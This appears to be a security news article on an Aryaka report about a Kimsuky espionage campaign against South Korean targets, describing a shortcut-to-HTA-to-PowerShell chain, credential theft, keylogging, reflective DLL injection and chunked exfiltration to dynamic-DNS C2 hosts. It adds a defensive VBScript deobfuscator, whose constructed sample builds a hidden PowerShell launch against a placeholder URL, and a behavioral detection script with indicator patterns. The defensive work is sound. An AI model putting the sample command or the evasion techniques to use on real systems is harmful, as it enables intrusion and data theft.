Figure: Overview of the infection chain (image: Aryaka)
A new report from Aryaka Threat Research Labs has disclosed a technically sophisticated and persistent cyber-espionage campaign attributed to North Korea's Kimsuky APT group. The operation, dissected step by step in Aryaka's report, shows how Kimsuky chains weaponized Windows shortcut files, layered obfuscation, and in-memory payload injection to gain a foothold on and remotely control compromised systems while leaving few artifacts on disk.
“This campaign demonstrates Kimsuky APT’s continued evolution in stealth, modularity, and targeting precision,” Aryaka stated in the conclusion of their technical blueprint.
The campaign begins with a familiar delivery method: malicious .LNK (Windows shortcut) files hidden inside ZIP attachments to phishing emails. Once the shortcut is opened, it silently launches an HTA (HTML Application) payload via mshta.exe. The HTA runs obfuscated VBScript that assembles download URLs at runtime, fetches remote payloads, and kicks off a multi-stage infection process.
“The HTA file contains heavily obfuscated VBScript… using a mix of decimal and hexadecimal values to hide its actual functionality,” the researchers wrote.
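To show what unpicking that kind of obfuscation looks like in practice, here is an added example, not code from the Aryaka report or from the campaign itself: a small Python deobfuscator for VBScript strings assembled from Chr() calls whose arguments mix decimal and hexadecimal (&H..) values. The sample script, the URL and the command it builds are constructed placeholders, and the Chr()-plus-concatenation pattern is assumed here as one common form of the technique the researchers describe, not the exact encoding used by the HTA.

```python
import re

# Constructed sample in the style the report describes: a VBScript string built from
# Chr() calls whose arguments mix decimal and hexadecimal (&H..) values. The URL and
# the command are placeholders for this example, not indicators from the Aryaka report.
SAMPLE_VBS = r'''
Dim u, s
u = Chr(104)&Chr(&H74)&Chr(116)&Chr(&H70)&Chr(58)&Chr(47)&Chr(&H2F)&Chr(101)&Chr(120)&Chr(97)&Chr(109)&Chr(112)&Chr(108)&Chr(101)&Chr(46)&Chr(105)&Chr(110)&Chr(118)&Chr(97)&Chr(108)&Chr(105)&Chr(100)&Chr(47)&Chr(&H61)
s = Chr(&H70)&Chr(111)&Chr(119)&Chr(101)&Chr(114)&Chr(115)&Chr(104)&Chr(101)&Chr(108)&Chr(108)
Execute s & " -w hidden -c " & u
'''

CHR_RE = re.compile(r'Chr\(\s*(&H[0-9A-Fa-f]+|\d+)\s*\)', re.IGNORECASE)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.MULTILINE)
EXEC_RE = re.compile(r'^\s*Execute\s+(.+?)\s*$', re.MULTILINE | re.IGNORECASE)
# A token is either a VBScript string literal ("" is an escaped quote) or an identifier.
TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|\w+')


def chr_value(token: str) -> int:
    """VBScript numeric literal: &H7A is hexadecimal, anything else is decimal."""
    if token[:2].upper() == '&H':
        return int(token[2:], 16)
    return int(token)


def fold_chr_calls(script: str) -> str:
    """Rewrite each Chr(n) as a quoted literal, then merge "a" & "b" into "ab"."""
    def to_literal(m: re.Match) -> str:
        return '"' + chr(chr_value(m.group(1))).replace('"', '""') + '"'
    folded = CHR_RE.sub(to_literal, script)
    # Adjacent literals joined by the & operator collapse into one literal.
    return re.sub(r'"\s*&\s*"', '', folded)


def eval_concat(expr: str, env: dict) -> str:
    """Evaluate a concatenation of string literals and already-known variables."""
    out = []
    for tok in TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            out.append(tok[1:-1].replace('""', '"'))
        else:
            out.append(env.get(tok, '<' + tok + '>'))  # unresolved names stay visible
    return ''.join(out)


def deobfuscate(script: str) -> tuple[dict, list]:
    """Return (variable name -> decoded value, decoded argument of each Execute)."""
    folded = fold_chr_calls(script)
    env: dict = {}
    for name, expr in ASSIGN_RE.findall(folded):
        env[name] = eval_concat(expr, env)
    executes = [eval_concat(expr, env) for expr in EXEC_RE.findall(folded)]
    return env, executes


if __name__ == '__main__':
    variables, executed = deobfuscate(SAMPLE_VBS)
    for name, value in variables.items():
        print(f'{name} = {value!r}')
    for cmd in executed:
        print('Execute ->', cmd)
```

Running it prints the reassembled URL and the full argument handed to Execute. On a real sample the same approach applies, but expect further layers (StrReverse, Replace() substitutions, a second Execute of the decoded text) that each need their own pass before the final command is readable.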
Victims are shown PDF lure documents crafted to resemble official South Korean government notices, such as sex offender alerts or tax penalty notices. These decoys are downloaded and opened automatically so that the user sees something plausible while the malware keeps executing in the background.
“It is likely that this campaign was distributed via spam emails… embedded within ZIP archives to bypass basic email filtering.”
Once on the victim's machine, the malware decodes and runs Base64-encoded PowerShell components: a credential stealer, a keylogger, and further payloads delivered in compressed archives such as pipe.zip. The stealer harvests credentials from browsers, email clients, and the file system, while the keylogger polls every 50 milliseconds to record keystrokes, clipboard contents, and the title of the active window.
To avoid running twice, the script writes its own Process ID to disk and checks it on start-up so that only one instance stays active. It also performs anti-VM checks and deletes itself if it detects an analysis environment such as VirtualBox or VMware.
The malware is built to collect only high-value data: saved passwords, encryption keys, cryptocurrency wallets, and recently accessed documents. It stages this data in structured directories under %TEMP%, compresses it, and exfiltrates it via HTTP POST requests in 1 MB chunks, a size chosen to slip past traffic inspection that keys on large uploads.
“UploadFile() is responsible for sending files to the attacker’s server… After a successful upload, the original ZIP and local data are deleted to cover tracks.”
The malware talks to hardcoded C2 servers on dynamic-DNS domains (e.g., ygbsbl.hopto.org, hvmeyq.viewdns.net) and polls them regularly for new commands. It can be instructed to download new payloads, upload files, and execute arbitrary PowerShell commands on demand via the /cm endpoint.
One advanced tactic is reflective DLL injection: the decrypted payload is written straight into process memory and executed from there, so the decrypted DLL never touches disk and is never loaded through the normal image loader. This sidesteps endpoint controls that key on file creation and image-load events.
“It allocates memory using VirtualAllocEx(), writes the decrypted DLL… and invokes its execution via CreateRemoteThread(),” Aryaka explained.
The operation clearly targets South Korean individuals and institutions. The use of authentic-looking South Korean government notices as lures, together with aggressive harvesting of Korean certificate stores such as NPKI and GPKI, leaves little doubt about the geopolitical intent.
“The tactics… strongly resemble those attributed to Kimsuky… known for conducting cyber-espionage operations primarily against South Korean government bodies, research institutions, and critical infrastructure.”
Aryaka concludes the report by recommending behavioral monitoring of process chains, PowerShell auditing (script block and module logging), and anomaly-based network detection as the key countermeasures.
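As an added illustration of those three recommendations, and not part of Aryaka's report or tooling, the Python below runs a handful of behavioral rules over constructed process-creation and proxy-log records shaped like the chain described above (explorer.exe spawning mshta.exe with an HTA URL, PowerShell with an encoded command under mshta.exe, repeated ~1 MB POSTs to a dynamic-DNS host, and GETs to the /cm command endpoint) and escalates only where process and network evidence meet in one process ancestry. The event records, the host abcdef.hopto.org, the paths and the field names are constructed for the example; the 1 MB chunk size, the /cm path and the hopto.org/viewdns.net suffixes come from the article, and treating them as indicators is this example's assumption, not a detection Aryaka published.

```python
import re
from collections import defaultdict

MIB = 1024 * 1024

# Constructed events, not from the Aryaka report. Process records mimic Sysmon
# Event ID 1 fields; network records mimic a web-proxy log. Hosts and paths other
# than the .hopto.org suffix and the /cm endpoint named in the article are placeholders.
PROCESS_EVENTS = [
    {"pid": 4012, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\winlogon.exe", "cmdline": "explorer.exe"},
    {"pid": 5120, "ppid": 4012, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "mshta.exe http://lure.example.invalid/notice.hta"},
    {"pid": 5388, "ppid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe", "cmdline": "powershell.exe -w hidden -enc SQBFAFgAIAAkAHUA"},
    {"pid": 6000, "ppid": 4012, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]
NET_EVENTS = [
    {"pid": 5388, "method": "POST", "host": "abcdef.hopto.org", "path": "/up", "bytes": 1_048_576},
    {"pid": 5388, "method": "POST", "host": "abcdef.hopto.org", "path": "/up", "bytes": 1_048_576},
    {"pid": 5388, "method": "POST", "host": "abcdef.hopto.org", "path": "/up", "bytes": 1_048_576},
    {"pid": 5388, "method": "POST", "host": "abcdef.hopto.org", "path": "/up", "bytes": 311_204},
    {"pid": 5388, "method": "GET", "host": "abcdef.hopto.org", "path": "/cm", "bytes": 0},
    {"pid": 6000, "method": "POST", "host": "backup.example.invalid", "path": "/api/v1/files", "bytes": 1_048_576},
]

DDNS_SUFFIXES = (".hopto.org", ".viewdns.net")  # providers behind the C2 names in the report
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.IGNORECASE)
LURE_ARG = re.compile(r"https?://|\.hta\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_findings(events):
    """Behavioral rules for the shortcut -> mshta.exe -> PowerShell chain."""
    findings = []
    for e in events:
        img, parent, cmd = basename(e["image"]), basename(e["parent"]), e["cmdline"]
        if img == "mshta.exe" and parent == "explorer.exe" and LURE_ARG.search(cmd):
            findings.append((e["pid"], "mshta.exe from explorer.exe with URL/.hta argument"))
        if img == "powershell.exe" and (parent == "mshta.exe" or ENCODED_PS.search(cmd)):
            findings.append((e["pid"], "powershell.exe under mshta.exe or with encoded command"))
    return findings


def network_findings(events, chunk=MIB, tolerance=0.02, min_chunks=3):
    """Network anomalies: dynamic-DNS C2, /cm polling, and uploads in ~1 MiB chunks."""
    findings, ddns_seen, chunked = [], set(), defaultdict(int)
    for e in events:
        key = (e["pid"], e["host"].lower())
        if key[1].endswith(DDNS_SUFFIXES) and key not in ddns_seen:
            ddns_seen.add(key)
            findings.append((e["pid"], f"traffic to dynamic-DNS host {e['host']}"))
        if e["method"] == "GET" and e["path"] == "/cm":
            findings.append((e["pid"], f"poll of /cm on {e['host']}"))
        if e["method"] == "POST" and abs(e["bytes"] - chunk) <= chunk * tolerance:
            chunked[key] += 1
    for (pid, host), n in chunked.items():
        if n >= min_chunks:  # a single 1 MiB POST is normal; a run of them is a chunked upload
            findings.append((pid, f"{n} POSTs of ~1 MiB to {host} (chunked upload)"))
    return findings


def triage(process_events, net_events):
    """Group findings per pid; escalate pids whose ancestry carries process evidence too."""
    parents = {e["pid"]: e["ppid"] for e in process_events}
    proc, net = defaultdict(list), defaultdict(list)
    for pid, msg in process_findings(process_events):
        proc[pid].append(msg)
    for pid, msg in network_findings(net_events):
        net[pid].append(msg)
    escalated = []
    for pid in net:
        p = pid
        while p in parents:           # walk up while we still have a record for the process
            if p in proc:
                escalated.append(pid)
                break
            p = parents[p]
    return dict(proc), dict(net), sorted(escalated)


if __name__ == "__main__":
    proc, net, escalated = triage(PROCESS_EVENTS, NET_EVENTS)
    for pid in sorted(set(proc) | set(net)):
        flag = "ESCALATE" if pid in escalated else "review"
        print(f"pid {pid} [{flag}]: " + "; ".join(proc.get(pid, []) + net.get(pid, [])))
```

In production these rules would read Sysmon or EDR telemetry instead of inline dicts; the point is the correlation. The lone 1 MiB POST from pid 6000 (a legitimate backup job started from explorer.exe) produces no finding, while the PowerShell process born from mshta.exe, with three chunked uploads and a /cm poll to a dynamic-DNS host, is the only pid escalated.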